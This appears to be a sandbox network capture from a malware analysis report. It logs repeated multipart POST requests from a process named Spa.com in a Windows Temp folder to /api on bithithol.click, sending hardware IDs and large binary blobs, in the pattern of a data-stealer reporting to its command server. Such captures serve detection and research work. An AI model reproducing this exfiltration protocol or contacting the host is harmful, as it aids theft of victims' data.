                                                                                                                Data Ascii: NKQsz/jVqasnnHG03esya1VIrVOEhNZSMrKT12gZOlfVAz7/GTV5ijVrQ2Xdy+M/FyzYpxUQAvWiUhewmXg/N9DGKaqs0LxOAUrkUY1fox80KKwyoJTS9aMyE6St3Buz4ecJ3Mo3mUo0b0Hkb0ij2wWsScblZNc1pkISVwj5v9AkYzwrLFGaq2SfcSXNv5CLhCy5ZzS088F3tmPQeP1f1lWD2a9owZx+UVokAZneR6rBrT224HVW9UK3M9EY+Uv
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 5a 34 35 35 5a 6c 50 55 4a 75 52 4d 4b 6b 75 5a 6d 38 31 44 62 32 79 41 58 58 32 5a 50 4f 44 59 74 47 39 43 64 70 48 30 65 4d 34 4b 67 30 78 6d 4e 39 52 2b 35 55 6b 6e 59 70 69 36 77 51 73 6e 63 52 6e 6b 72 50 68 31 74 59 6e 4e 65 33 70 47 53 50 67 4e 2f 31 76 57 4c 5a 36 47 67 52 50 63 62 54 64 79 6c 61 50 30 55 78 64 73 67 66 6b 30 73 45 47 77 74 4e 51 58 65 77 4c 4d 32 48 6e 53 61 7a 64 4d 5a 68 2f 55 66 75 53 42 4a 78 4c 6f 76 70 55 57 48 76 58 74 41 43 7a 34 55 66 48 41 39 42 34 2f 56 2f 57 56 61 50 5a 72 32 6a 42 6e 48 35 52 57 69 51 42 6d 64 35 48 71 73 47 74 50 62 62 67 64 56 62 6c 51 72 63 7a 30 52 6a 35 53 7a 4d 41 6c 77 31 50 47 50 53 35 6d 32 55 66 70 53 64 50 53 52 4a 62 35 52 78 4a 78 47 65 53 77 33 43 6d 5a 75 65 6e 66 78 35 4b 77 36 47 44
                                                                                                                Data Ascii: Z455ZlPUJuRMKkuZm81Db2yAXX2ZPODYtG9CdpH0eM4Kg0xmN9R+5UknYpi6wQsncRnkrPh1tYnNe3pGSPgN/1vWLZ6GgRPcbTdylaP0Uxdsgfk0sEGwtNQXewLM2HnSazdMZh/UfuSBJxLovpUWHvXtACz4UfHA9B4/V/WVaPZr2jBnH5RWiQBmd5HqsGtPbbgdVblQrcz0Rj5SzMAlw1PGPS5m2UfpSdPSRJb5RxJxGeSw3CmZuenfx5Kw6GD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.449738104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:45 UTC277OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2D2UJO7589V6LA
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 18139
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:45 UTC15331OUTData Raw: 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35
                                                                                                                Data Ascii: --2D2UJO7589V6LAContent-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--2D2UJO7589V6LAContent-Disposition: form-data; name="pid"2--2D2UJO7589V6LAContent-Disposition: form-data; name="lid"VvQOXN--dozp1--2D2UJO75
                                                                                                                2024-12-24 12:52:45 UTC2808OUTData Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11
                                                                                                                Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                2024-12-24 12:52:47 UTC1129INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=rq6kvr2cra02epvsv7lunrv4m8; expires=Sat, 19 Apr 2025 06:39:26 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s94GRwRgsi%2F122%2BkgmrQ5XXOfDzY7rjPNozQE%2Frzqg7t9p8GXn0yMFn3TE1Rnpn9ZRQqse2BWVkZELktnDhgSSdp4YDUor27X9nh3wCCz25DOU30UPYCDl9QXsnC4w15oOY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70baf90a948c0f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=17867&min_rtt=5884&rtt_var=9911&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19096&delivery_rate=496261&cwnd=220&unsent_bytes=0&cid=4f01772db1ab4a97&ts=2166&x=0"
                                                                                                                2024-12-24 12:52:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.449739104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:48 UTC270OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=MTRJJO06
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8724
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:48 UTC8724OUTData Raw: 2d 2d 4d 54 52 4a 4a 4f 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 4d 54 52 4a 4a 4f 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 54 52 4a 4a 4f 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 4d 54 52 4a 4a 4f 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                Data Ascii: --MTRJJO06Content-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--MTRJJO06Content-Disposition: form-data; name="pid"2--MTRJJO06Content-Disposition: form-data; name="lid"VvQOXN--dozp1--MTRJJO06Content-Disposit
                                                                                                                2024-12-24 12:52:49 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=n2dsq7v14ih6u2bq7ttdme0ik7; expires=Sat, 19 Apr 2025 06:39:28 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lXHb8D42SdFumPKaBOhXg58DcicGLOsaUBMpXM0v33UgF5YniM16FRvYqF5i30xQeJnhw4lu59VaHEz%2BdZvvj7MObOH%2FTisHDFkiWkO5MfEI7ckSYCg7aCQk2VzALgXy0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb0ebc588ce8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1933&rtt_var=726&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9652&delivery_rate=1510605&cwnd=237&unsent_bytes=0&cid=d06ac182e3ebaea2&ts=901&x=0"
                                                                                                                2024-12-24 12:52:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.449740104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:51 UTC271OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=6EVNCTOU
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20377
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:51 UTC15331OUTData Raw: 2d 2d 36 45 56 4e 43 54 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 36 45 56 4e 43 54 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 45 56 4e 43 54 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 36 45 56 4e 43 54 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                Data Ascii: --6EVNCTOUContent-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--6EVNCTOUContent-Disposition: form-data; name="pid"3--6EVNCTOUContent-Disposition: form-data; name="lid"VvQOXN--dozp1--6EVNCTOUContent-Disposit
                                                                                                                2024-12-24 12:52:51 UTC5046OUTData Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00
                                                                                                                Data Ascii: QMn 64F6(X&7~`aO@dR<x)
                                                                                                                2024-12-24 12:52:52 UTC1132INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=el0n8f134t34s22b2mmm7labcm; expires=Sat, 19 Apr 2025 06:39:31 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Un1as2KKAUgNgoj8FBfsPLOQ6rw8xPKdAu%2BIQ6uwA%2BbQEfrUyeZoOYtnumPNdxu9TPBYqibCtbLyiLbj9wYwciIToI9eY3SEyf8IKs%2B8uwLSYfHiHLU%2FeEycj9Y0FGsGWfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb1d1e578c96-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14087&min_rtt=1973&rtt_var=8094&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21328&delivery_rate=1479979&cwnd=188&unsent_bytes=0&cid=9009b58c1f5278c8&ts=1291&x=0"
                                                                                                                2024-12-24 12:52:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.449741104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:53 UTC274OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=KRE4KMW7W5DD
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1236
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:53 UTC1236OUTData Raw: 2d 2d 4b 52 45 34 4b 4d 57 37 57 35 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 4b 52 45 34 4b 4d 57 37 57 35 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 52 45 34 4b 4d 57 37 57 35 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 4b 52 45 34 4b 4d 57 37 57 35 44 44 0d 0a
                                                                                                                Data Ascii: --KRE4KMW7W5DDContent-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--KRE4KMW7W5DDContent-Disposition: form-data; name="pid"1--KRE4KMW7W5DDContent-Disposition: form-data; name="lid"VvQOXN--dozp1--KRE4KMW7W5DD
                                                                                                                2024-12-24 12:52:54 UTC1122INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:54 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=v3avniko7i71gm8nqsn89hivqj; expires=Sat, 19 Apr 2025 06:39:33 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNtYsx6urwJC0yK%2FgTJ939F7FGgR5XLmk%2FsDAqkZATZl53cLYEFxpPOiQD12htWrSVAJX5OXPXpy86PkTTTlQpNe58mc59Fyad9UNjMQBA0543qb61ESxadG5FE7NYaNzWo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb2db8344210-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1974&rtt_var=757&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2146&delivery_rate=1429970&cwnd=244&unsent_bytes=0&cid=b4cb9216ff5b7060&ts=854&x=0"
                                                                                                                2024-12-24 12:52:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.449742104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:56 UTC279OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2FZJYP1YF9HPNRO
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 558955
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 2d 2d 32 46 5a 4a 59 50 31 59 46 39 48 50 4e 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 32 46 5a 4a 59 50 31 59 46 39 48 50 4e 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 46 5a 4a 59 50 31 59 46 39 48 50 4e 52 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 32 46 5a 4a 59
                                                                                                                Data Ascii: --2FZJYP1YF9HPNROContent-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--2FZJYP1YF9HPNROContent-Disposition: form-data; name="pid"1--2FZJYP1YF9HPNROContent-Disposition: form-data; name="lid"VvQOXN--dozp1--2FZJY
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 96 78 41 b9 1d ac 1e af eb dc 1e cf f1 43 54 dd 9d d4 a5 8f ba 8b 3b b5 02 4c c5 d9 41 2a 8d a7 d4 6f 47 8d 41 24 50 ba 90 c0 6a 5b 72 e3 6b 28 ac 2b 52 f6 30 46 1f 0b 07 2c 40 4c f6 23 05 83 bf 4d 23 de ca d9 41 c4 89 a6 91 f6 f4 0e ce 84 e1 95 7c f4 85 ed 60 fb d6 8c 68 b3 e8 a8 ef 5c 96 07 28 98 b4 b7 e6 ed ed 05 fb 64 f3 b6 60 c5 69 84 86 36 50 56 4b b6 e4 39 dd 7e 48 24 c4 d4 8e 2a 7d 2a b5 ac b4 3e 11 99 69 7e 95 95 de ed da 68 d0 01 9e a0 d3 04 8c 8c c9 81 d0 e3 13 4f 46 23 c5 21 a2 13 fc 8d 55 2f e7 11 9e 51 f0 ca b5 03 15 a7 0c 7e 64 af 54 ab ac 8e eb 3e 25 a4 a5 18 67 41 d3 ce f0 cc 90 61 a3 ee fd 70 c2 10 f4 24 74 2a 13 0d 03 af 83 0c 0a 37 be 23 ff ba c7 65 1b 1b 5e 63 51 e1 6b 98 01 5d 0e 7e 59 5d 26 2d c7 cd 28 27 86 66 06 d2 ba 5d af 13 9e
                                                                                                                Data Ascii: xACT;LA*oGA$Pj[rk(+R0F,@L#M#A|`h\(d`i6PVK9~H$*}*>i~hOF#!U/Q~dT>%gAap$t*7#e^cQk]~Y]&-('f]
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 13 c8 24 5e 60 bd b3 25 f5 8d 61 43 93 1a 26 f4 d9 d0 1a 7c ae 14 46 bb e2 c1 e1 27 32 3c 92 92 a8 68 f4 57 0a ba 31 1a d5 dc 90 21 a1 73 50 a5 b1 47 4b 74 ee af 8d e4 a5 e3 fc 5a c4 27 8f 9f cb c4 48 f3 5d c9 e8 21 be e3 3a c2 f7 e6 5a 40 a9 14 59 f6 30 11 0f 06 6e 7f 8f 8e 37 82 af 00 b7 23 34 5f 62 39 92 9e c7 65 a1 68 04 8c 77 c9 db 07 0e 2a 98 bc c3 2d 7a b4 10 27 17 83 96 d2 8e de f0 c6 87 43 81 1a df 82 cf a7 44 be f7 39 b5 14 8a cd 75 d1 23 96 39 d3 6d b1 43 22 1b 55 9a f7 b0 d1 b5 fc c4 bc 7a 6a db da cb e7 04 50 d7 65 53 db 52 93 91 65 9b 1a 56 67 f5 b2 0a 93 44 21 8e e5 a0 68 7b be 85 a8 9f 24 1f 5b f5 32 ca 76 19 0c 8d 8e 1a ee 10 7d 32 d1 d5 9c f8 95 5f 52 ee 8d 7e 12 57 91 06 62 7a ff c1 c6 9a 1e 75 bb be f3 55 2a 7a bb 46 17 7f 44 a0 72 8b
                                                                                                                Data Ascii: $^`%aC&|F'2<hW1!sPGKtZ'H]!:Z@Y0n7#4_b9ehw*-z'CD9u#9mC"UzjPeSReVgD!h{$[2v}2_R~WbzuU*zFDr
                                                                                                                2024-12-24 12:52:56 UTC15331OUTData Raw: 57 0f 0e 96 97 7b 73 63 7e ab c1 88 d5 f2 48 22 6d ed 98 9d 25 16 58 6e 9f 26 ef 8f 85 a3 f9 81 5a 4e de 35 08 e8 9d 5b 43 64 d0 e9 df 2f 1c 2e fc 80 c7 f9 ae c6 94 ee bb a5 ae 51 1b f4 45 05 05 b2 33 aa c6 ce b6 b4 60 cf 90 37 fe 76 68 b3 bd 77 b8 52 83 7e f4 83 18 65 06 33 5b ac 58 7a ea b8 76 f7 81 38 f4 ba e9 e3 d7 cc f8 09 9d b3 a2 61 5d 50 a5 67 1f 1f 7c a0 18 e8 a3 b6 af 49 a4 c2 65 55 27 21 c6 8d 82 9d c0 60 9e 91 63 d2 a4 0a 5e ec b0 f3 a8 35 9f 50 5e d0 87 a8 59 21 85 16 f4 e7 28 b1 63 11 53 98 bf c6 1e 23 e1 1c 15 c6 74 19 ff f9 69 78 c7 52 29 e7 31 cb a3 cd ec 38 47 2e df bf 3e 28 68 59 5c 6b fe b7 1c 4d f9 92 6a ed ad fc ed 93 44 e6 11 49 58 78 74 4f 36 f1 af 07 a4 5b 2f 01 c1 db 6e c1 55 b0 ea d6 ba 73 f2 9b ae 3d 79 f3 16 f9 23 8e bd 11 b4
                                                                                                                Data Ascii: W{sc~H"m%Xn&ZN5[Cd/.QE3`7vhwR~e3[Xzv8a]Pg|IeU'!`c^5P^Y!(cS#tixR)18G.>(hY\kMjDIXxtO6[/nUs=y#
